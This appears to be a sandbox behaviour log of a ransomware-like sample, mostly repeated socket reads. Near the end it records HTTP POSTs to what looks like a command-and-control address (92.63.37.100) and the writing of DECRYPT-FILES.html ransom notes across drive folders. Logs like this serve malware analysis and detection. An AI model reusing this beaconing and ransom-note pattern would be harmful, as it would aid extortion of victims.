Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 170, size_out = 170 True 1
Fn
Data
Inet Read Response size = 170, size_out = 170 True 1
Fn
Data
Socket Close type = SOCK_STREAM True 1
Fn
Inet Close Session - True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x76c20000 True 1
Fn
System Get Time type = Ticks, time = 119200 True 2
Fn
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x76c20000 True 1
Fn
Socket Create protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM True 1
Fn
Socket Connect remote_address = 92.63.37.100, remote_port = 80 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x76c20000 True 1
Fn
Socket Send flags = NO_FLAG_SET, size = 500, size_out = 500 True 1
Fn
Data
Inet Open Session user_agent = Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko True 1
Fn
Inet Open Connection protocol = http, server_name = 92.63.37.100, server_port = 80 True 1
Fn
Inet Open HTTP Request http_verb = POST, http_version = HTTP/1.1, target_resource = /post/checkout/mkgqp.cgi?iii=8128v5 True 1
Fn
Inet Send HTTP Request headers = User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko, Host: 92.63.37.100, Content-Type: application/x-www-form-urlencoded, Content-Length: 247, Connection: Keep-Alive, url = 92.63.37.100/post/checkout/mkgqp.cgi?iii=8128v5 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1
Fn
Data
Inet Read Response size = 1, size_out = 1 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 0, size_out = 0 True 1
Fn
Inet Read Response size = 0, size_out = 0 True 1
Fn
Socket Close type = SOCK_STREAM True 1
Fn
Inet Close Session - True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x76c20000 True 1
Fn
Inet Open Session user_agent = Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko, access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Inet Open Connection protocol = HTTP, server_name = 92.63.37.100, server_port = 80 True 1
Fn
Inet Open HTTP Request http_verb = POST, http_version = HTTP 1.1, target_resource = /post/checkout/mkgqp.cgi?iii=8128v5, accept_types = 0 True 1
Fn
Inet Send HTTP Request headers = Content-Type: application/x-www-form-urlencoded, url = 92.63.37.100/post/checkout/mkgqp.cgi?iii=8128v5 False 1
Fn
Data
Thread 0xa74
252 0
»
Category Operation Information Success Count Logfile
System Get Time type = Ticks, time = 118139 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x76c20000 True 1
Fn
Window Create window_name = kfw96 9 5, class_name = kfw96 9 5, wndproc_parameter = 0 True 1
Fn
Thread 0xa80
2499 0
»
Category Operation Information Success Count Logfile
File Create filename = C:\\wevkgn5.dat, file_attributes = FILE_FLAG_DELETE_ON_CLOSE True 1
Fn
File Create filename = C:\\DECRYPT-FILES.html, desired_access = GENERIC_WRITE True 1
Fn
File Write filename = C:\\DECRYPT-FILES.html, size = 6586 True 1
Fn
Data
File Create filename = C:\$Recycle.Bin\\wevkgn5.dat, file_attributes = FILE_FLAG_DELETE_ON_CLOSE True 1
Fn
File Create filename = C:\$Recycle.Bin\\DECRYPT-FILES.html, desired_access = GENERIC_WRITE True 1
Fn
File Write filename = C:\$Recycle.Bin\\DECRYPT-FILES.html, size = 6586 True 1
Fn
Data
File Create filename = C:\$Recycle.Bin\S-1-5-21-3388679973-3930757225-3770151564-1000\\wevkgn5.dat, file_attributes = FILE_FLAG_DELETE_ON_CLOSE True 1
Fn
File Create filename = C:\$Recycle.Bin\S-1-5-21-3388679973-3930757225-3770151564-1000\\DECRYPT-FILES.html, desired_access = GENERIC_WRITE True 1
Fn
File Write filename = C:\$Recycle.Bin\S-1-5-21-3388679973-3930757225-3770151564-1000\\DECRYPT-FILES.html, size = 6586 True 1
Fn
Data
File Create filename = C:\$Recycle.Bin\S-1-5-21-3388679973-3930757225-3770151564-1000\wevkgn5.dat, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ False 1
Fn
File Create filename = C:\$Recycle.Bin\wevkgn5.dat, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ False 1
Fn
File Create filename = C:\Boot\\wevkgn5.dat, file_attributes = FILE_FLAG_DELETE_ON_CLOSE True 1
Fn
